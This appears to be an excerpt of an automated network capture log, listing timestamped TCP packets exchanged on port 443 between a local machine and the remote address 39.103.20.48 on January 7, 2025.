                                Jan 7, 2025 04:15:40.791632891 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.791654110 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.791670084 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.791764975 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.791799068 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.791817904 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.791826010 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.791851044 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.791860104 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.791996956 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.792042017 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.792058945 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.792066097 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.792089939 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.792102098 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.792241096 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.792293072 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.792438984 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.792494059 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.792634964 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.792671919 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.792690992 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.792696953 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.792707920 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.792709112 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.792727947 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.792735100 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.792762995 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.792782068 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.793082952 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.793121099 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.793145895 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.793152094 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.793162107 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.793198109 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.793365002 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.793410063 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.793417931 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.793423891 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.793442011 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.793452978 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.793473005 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.793478012 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.793498993 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.793524027 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.796200037 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.796267986 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.796457052 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.796513081 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.796613932 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.796653032 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.796675920 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.796681881 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.796708107 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.796724081 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.796783924 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.796849966 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.796880007 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.796958923 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797038078 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797072887 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797101021 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797107935 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797127962 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797148943 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797223091 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797286034 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797374010 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797413111 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797424078 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797429085 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797461033 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797471046 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797597885 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797636032 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797650099 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797657967 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797683954 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797702074 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797785044 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797833920 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797924042 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797956944 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797970057 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.797976971 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.797998905 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.798006058 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.877646923 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.877710104 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.877877951 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.877933025 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.878041983 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.878076077 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.878088951 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.878096104 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.878113031 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.878130913 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.878201962 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.878248930 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.878319979 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.878369093 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.878556967 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.878588915 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.878607035 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.878614902 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.878626108 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.878653049 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.878772974 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.878812075 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.878820896 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.878827095 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.878851891 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.878882885 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.879053116 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.879086971 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.879096031 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.879102945 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.879127026 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.879138947 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.879230976 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.879273891 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.879291058 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.879297018 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.879322052 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.879338980 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.879411936 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.879456043 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.879462957 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.879473925 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.879504919 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.879509926 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.879513979 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.879522085 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.879545927 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.879570961 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.879867077 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.879910946 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.880069017 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.880109072 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.880116940 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.880124092 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.880143881 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.880147934 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.880158901 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.880165100 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.880184889 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.880188942 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.880212069 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.880218983 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.880243063 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.880269051 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.880351067 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.880398989 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:40.880530119 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:40.880584002 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.014468908 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.014544964 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.014565945 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.014612913 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.014616966 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.014633894 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.014657021 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.014672041 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.014761925 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.014816046 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.014888048 CET4434971239.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:41.014935017 CET49712443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:41.015089035 CET4434971239.103.20.48192.168.2.8
Jan 7, 2025 04:15:41.015120029 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015139103 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015146017 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015156984 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015183926 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015304089 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015355110 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015472889 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015508890 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015523911 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015530109 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015542984 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015554905 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015573978 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015578985 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015599012 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015625954 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015753984 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015799046 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015799999 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015810966 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015837908 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015846968 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015860081 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015866041 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015878916 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015886068 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015921116 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015924931 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.015940905 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.015971899 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.016182899 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.016232967 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.016455889 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.016503096 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.016521931 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.016529083 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.016550064 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.016554117 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.016562939 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.016567945 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.016588926 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.016597986 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.016622066 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.016624928 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.016635895 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.016650915 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.016673088 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.016689062 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.017128944 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017168999 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017179966 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.017185926 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017205954 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017214060 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.017221928 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.017225981 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017241001 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017271042 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.017271042 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.017278910 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017291069 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017297983 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.017323971 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017330885 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.017338037 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017374992 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.017393112 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017452002 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.017884970 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017920017 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017937899 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.017946005 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.017957926 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.017981052 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.018142939 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.018187046 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.018197060 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.018203020 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.018218040 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.018225908 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.018245935 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.018250942 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.018264055 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.018294096 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.100864887 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.100912094 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.100941896 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.100954056 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.100970984 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.101002932 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.101003885 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.101016045 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.101047039 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.101072073 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.101136923 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.101183891 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.101238012 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.101289988 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.101394892 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.101427078 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.101449013 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.101457119 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.101465940 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.101495981 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.101634026 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.101686001 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.101804018 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.101840019 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.101857901 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.101864100 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.101882935 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.101897001 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102046967 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102083921 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102094889 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102101088 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102119923 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102127075 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102143049 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102147102 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102164030 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102190971 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102339983 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102384090 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102590084 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102624893 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102639914 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102647066 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102663994 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102679014 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102680922 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102690935 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102724075 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102749109 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102870941 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102936029 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102956057 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.102963924 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102973938 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.102991104 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.103002071 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.103005886 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.103034019 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.103055954 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.103223085 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.103262901 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.103271961 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.103276968 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.103295088 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.103317976 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.103502989 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.103547096 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.103554010 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.103559971 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.103576899 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.103591919 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.103601933 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.103606939 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.103632927 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.103656054 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.104017019 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.104058027 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.104078054 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.104083061 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.104094982 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.104110003 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.104124069 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.104129076 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.104151011 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.104162931 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.104176998 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.104182959 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.104196072 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.104219913 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.104243040 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.104248047 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.104289055 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.237720966 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.237803936 CET  49712  443    192.168.2.8   39.103.20.48
Jan 7, 2025 04:15:41.237936974 CET  443    49712  39.103.20.48  192.168.2.8
Jan 7, 2025 04:15:41.237979889 CET  443    49712  39.103.20.48  192.168.2.8
